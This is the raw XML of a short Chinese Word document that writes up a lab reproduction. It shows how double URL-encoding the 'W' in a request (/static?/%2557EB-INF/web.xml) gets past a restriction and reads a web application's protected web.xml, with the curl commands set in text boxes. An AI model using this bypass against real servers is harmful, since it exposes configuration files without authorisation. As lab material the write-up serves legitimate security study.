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2643FE" w:rsidRDefault="002643FE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002643FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>一、靶场搭建</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002643FE" w:rsidRDefault="002643FE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2643FE" w:rsidRDefault="002643F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74310" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="2159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3FE" w:rsidRDefault="002643FE">
                            <w:r w:rsidRPr="002643FE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rINQIAAEgEAAAOAAAAZHJzL2Uyb0RvYy54bWysVM2O0zAQviPxDpbvNE1I9ydqulq6FCEt&#10;P9LCAziO01g4HmO7TcoDwBtw4sKd5+pzMHa6pVrggsjB8njGn2e+bybzq6FTZCusk6BLmk6mlAjN&#10;oZZ6XdL371ZPLihxnumaKdCipDvh6NXi8aN5bwqRQQuqFpYgiHZFb0raem+KJHG8FR1zEzBCo7MB&#10;2zGPpl0ntWU9oncqyabTs6QHWxsLXDiHpzejky4iftMI7t80jROeqJJibj6uNq5VWJPFnBVry0wr&#10;+SEN9g9ZdExqfPQIdcM8Ixsrf4PqJLfgoPETDl0CTSO5iDVgNen0QTV3LTMi1oLkOHOkyf0/WP56&#10;+9YSWZc0S88p0axDkfZfv+y//dh//0yyQFBvXIFxdwYj/fAMBhQ6FuvMLfAPjmhYtkyvxbW10LeC&#10;1ZhgGm4mJ1dHHBdAqv4V1PgO23iIQENju8Ae8kEQHYXaHcURgyccD2fZef40RRdHX5pP87Msypew&#10;4v66sc6/ENCRsCmpRfUjPNveOh/SYcV9SHjNgZL1SioVDbuulsqSLcNOWcUvVvAgTGnSl/Ryls1G&#10;Bv4KMY3fnyA66bHllexKenEMYkXg7bmuY0N6JtW4x5SVPhAZuBtZ9EM1HISpoN4hpRbG1sZRxE0L&#10;9hMlPbZ1Sd3HDbOCEvVSoyyXaZ6HOYhGPjtHDok99VSnHqY5QpXUUzJulz7OTiTMXKN8KxmJDTqP&#10;mRxyxXaNfB9GK8zDqR2jfv0AFj8BAAD//wMAUEsDBBQABgAIAAAAIQAT2JDY3AAAAAUBAAAPAAAA&#10;ZHJzL2Rvd25yZXYueG1sTI/BTsMwEETvSPyDtUjcqNMgqipkUyGqnimlEuLm2Ns4arwOsZumfD2G&#10;C1xWGs1o5m25mlwnRhpC6xlhPstAEGtvWm4Q9m+buyWIEBUb1XkmhAsFWFXXV6UqjD/zK4272IhU&#10;wqFQCDbGvpAyaEtOhZnviZN38INTMcmhkWZQ51TuOpln2UI61XJasKqnZ0v6uDs5hLDefvb6sK2P&#10;1ly+Xtbjg37ffCDe3kxPjyAiTfEvDD/4CR2qxFT7E5sgOoT0SPy9yVveZwsQNUKez3OQVSn/01ff&#10;AAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29u&#10;dGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAA&#10;LwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhACOAWsg1AgAASAQAAA4AAAAAAAAAAAAAAAAA&#10;LgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhABPYkNjcAAAABQEAAA8AAAAAAAAAAAAA&#10;AAAAjwQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAACYBQAAAAA=&#10;">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="002643FE" w:rsidRDefault="002643FE">
                      <w:r w:rsidRPr="002643FE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43FE" w:rsidRDefault="002643FE"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2643FE" w:rsidRDefault="002643FE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002643FE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1796946"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1" name="图片 1" descr="C:\Users\Toby\AppData\Local\Temp\165357270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57270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FE" w:rsidRDefault="002643FE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002643FE" w:rsidRPr="002643FE" w:rsidRDefault="002643FE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002643FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>二、漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002643FE" w:rsidRDefault="002643FE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1、正常访问/</w:t>
      </w:r>
      <w:r>
        <w:t>static?/WEB-INF/web.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，显示4</w:t>
      </w:r>
      <w:r>
        <w:t>04</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002643FE" w:rsidRDefault="002643FE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5301343" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="1397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13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3FE" w:rsidRPr="002643FE" w:rsidRDefault="002643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cu</w:t>
                            </w:r>
                            <w:r>
                              <w:t>rl –v ‘http://ip:8080/stat</w:t>
                            </w:r>
                            <w:r w:rsidRPr="002643FE">
                              <w:t>ic?/WEB-INF/web.xml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7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6PNgIAAE0EAAAOAAAAZHJzL2Uyb0RvYy54bWysVM2O0zAQviPxDpbvND9Nl92o6WrpUoS0&#10;/EgLD+A4TmPhP2y3SXmA5Q04ceHOc/U5GDvdbrXABZGD5fGMP89830zml4MUaMus41pVOJukGDFF&#10;dcPVusIfP6yenWPkPFENEVqxCu+Yw5eLp0/mvSlZrjstGmYRgChX9qbCnfemTBJHOyaJm2jDFDhb&#10;bSXxYNp10ljSA7oUSZ6mZ0mvbWOspsw5OL0enXgR8duWUf+ubR3zSFQYcvNxtXGtw5os5qRcW2I6&#10;Tg9pkH/IQhKu4NEj1DXxBG0s/w1Kcmq1062fUC0T3bacslgDVJOlj6q57YhhsRYgx5kjTe7/wdK3&#10;2/cW8abCOUaKSJBo/+3r/vvP/Y87lAd6euNKiLo1EOeHF3oAmWOpztxo+skhpZcdUWt2Za3uO0Ya&#10;SC8LN5OTqyOOCyB1/0Y38A7ZeB2BhtbKwB2wgQAdZNodpWGDRxQOZ9M0mxZTjCj4siItzvIoXkLK&#10;++vGOv+KaYnCpsIWtI/wZHvjfEiHlPch4TWnBW9WXIho2HW9FBZtCfTJKn6xgkdhQqG+whezfDYy&#10;8FeINH5/gpDcQ8MLLit8fgwiZeDtpWpiO3rCxbiHlIU6EBm4G1n0Qz1EySLLgeRaNztg1uqxv2Ee&#10;YdNp+wWjHnq7wu7zhliGkXitQJ2LrCjCMESjmD0HKpE99dSnHqIoQFXYYzRulz4OUOTNXIGKKx75&#10;fcjkkDL0bKT9MF9hKE7tGPXwF1j8AgAA//8DAFBLAwQUAAYACAAAACEAeaFYhtwAAAAFAQAADwAA&#10;AGRycy9kb3ducmV2LnhtbEyPzU7DMBCE70i8g7VI3KjT8KMS4lSIqmdKQULcHHsbR43XIXbTlKdn&#10;4QKXlUYzmvm2XE6+EyMOsQ2kYD7LQCCZYFtqFLy9rq8WIGLSZHUXCBWcMMKyOj8rdWHDkV5w3KZG&#10;cAnFQitwKfWFlNE49DrOQo/E3i4MXieWQyPtoI9c7juZZ9md9LolXnC6xyeHZr89eAVxtfnszW5T&#10;7509fT2vxlvzvv5Q6vJienwAkXBKf2H4wWd0qJipDgeyUXQK+JH0e9lbXN/cg6gV5Pk8B1mV8j99&#10;9Q0AAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0Nv&#10;bnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAA&#10;AC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAyhi6PNgIAAE0EAAAOAAAAAAAAAAAAAAAA&#10;AC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQB5oViG3AAAAAUBAAAPAAAAAAAAAAAA&#10;AAAAAJAEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAmQUAAAAA&#10;">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="002643FE" w:rsidRPr="002643FE" w:rsidRDefault="002643FE">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>cu</w:t>
                      </w:r>
                      <w:r>
                        <w:t>rl –v ‘http://ip:8080/stat</w:t>
                      </w:r>
                      <w:r w:rsidRPr="002643FE">
                        <w:t>ic?/WEB-INF/web.xml</w:t>
                      </w:r>
                      <w:r>
                        <w:t>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43FE" w:rsidRPr="002643FE" w:rsidRDefault="002643FE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F53A56F" wp14:editId="5936D0FF">
            <wp:extent cx="5274310" cy="2178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FE" w:rsidRDefault="002643FE">
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、对字母W进行双U</w:t>
      </w:r>
      <w:r>
        <w:t>RL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码，成功绕过限制访问w</w:t>
      </w:r>
      <w:r>
        <w:t>eb.xml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002643FE" w:rsidRDefault="002643FE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5285014" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="1143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0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3FE" w:rsidRDefault="002643FE">
                            <w:r>
                              <w:t>curl -v 'http://</w:t>
                            </w:r>
                            <w:r w:rsidRPr="002643FE">
                              <w:t>ip:8080/static?/%2557EB-INF/web.xml'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RUNgIAAE0EAAAOAAAAZHJzL2Uyb0RvYy54bWysVM2O0zAQviPxDpbvNElJl27UdLV0KUJa&#10;fqSFB3Acp7FwPMZ2mywPsLwBJy7cea4+B2OnW6oFLogcLI9n/Hnm+2ayuBg6RXbCOgm6pNkkpURo&#10;DrXUm5J+eL9+MqfEeaZrpkCLkt4KRy+Wjx8telOIKbSgamEJgmhX9KakrfemSBLHW9ExNwEjNDob&#10;sB3zaNpNUlvWI3qnkmmaniU92NpY4MI5PL0anXQZ8ZtGcP+2aZzwRJUUc/NxtXGtwposF6zYWGZa&#10;yQ9psH/IomNS46NHqCvmGdla+RtUJ7kFB42fcOgSaBrJRawBq8nSB9XctMyIWAuS48yRJvf/YPmb&#10;3TtLZF3Sp5Ro1qFE+69f9t9+7L/fkWmgpzeuwKgbg3F+eA4DyhxLdeYa+EdHNKxapjfi0lroW8Fq&#10;TC8LN5OTqyOOCyBV/xpqfIdtPUSgobFd4A7ZIIiOMt0epRGDJxwPZ9P5LM1ySjj6sjzNz6ZRvIQV&#10;99eNdf6lgI6ETUktah/h2e7a+ZAOK+5DwmsOlKzXUqlo2E21UpbsGPbJOn6xggdhSpO+pOez6Wxk&#10;4K8Qafz+BNFJjw2vZFfS+TGIFYG3F7qO7eiZVOMeU1b6QGTgbmTRD9UQJTvqU0F9i8xaGPsb5xE3&#10;LdjPlPTY2yV1n7bMCkrUK43qnGd5HoYhGvnsGVJJ7KmnOvUwzRGqpJ6ScbvycYAib+YSVVzLyG+Q&#10;e8zkkDL2bKT9MF9hKE7tGPXrL7D8CQAA//8DAFBLAwQUAAYACAAAACEAMmP9GdwAAAAFAQAADwAA&#10;AGRycy9kb3ducmV2LnhtbEyPwW7CMBBE75X6D9ZW6q04GLVCaRxUgTgXKFLVm2MvcUS8DrEJga+v&#10;20t7WWk0o5m3xWJ0LRuwD40nCdNJBgxJe9NQLWH/sX6aAwtRkVGtJ5RwxQCL8v6uULnxF9risIs1&#10;SyUUciXBxtjlnAdt0akw8R1S8g6+dyom2dfc9OqSyl3LRZa9cKcaSgtWdbi0qI+7s5MQVptTpw+b&#10;6mjN9fa+Gp715/pLyseH8e0VWMQx/oXhBz+hQ5mYKn8mE1grIT0Sf2/y5jMxA1ZJEGIqgJcF/09f&#10;fgMAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0Nv&#10;bnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAA&#10;AC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCLWQRUNgIAAE0EAAAOAAAAAAAAAAAAAAAA&#10;AC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQAyY/0Z3AAAAAUBAAAPAAAAAAAAAAAA&#10;AAAAAJAEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAmQUAAAAA&#10;">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="002643FE" w:rsidRDefault="002643FE">
                      <w:r>
                        <w:t>curl -v 'http://</w:t>
                      </w:r>
                      <w:r w:rsidRPr="002643FE">
                        <w:t>ip:8080/static?/%2557EB-INF/web.xml'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43FE" w:rsidRDefault="002643FE" w:rsidP="002643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3FCCC4" wp14:editId="0D699049">
            <wp:extent cx="5274310" cy="2187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B24" w:rsidRDefault="00D05B24" w:rsidP="002643FE">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00D05B24" w:rsidRDefault="00D05B24" w:rsidP="0026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B24" w:rsidRDefault="00D05B24" w:rsidP="002643FE">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00D05B24" w:rsidRDefault="00D05B24" w:rsidP="00264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8D"/>
    <w:rsid w:val="002643FE"/>
    <w:rsid w:val="00D05B24"/>
    <w:rsid w:val="00E6008D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2C285"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{35B033E1-88B3-48CD-A0CE-EDB3E6B0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2022-05-26T13:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-26T13:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>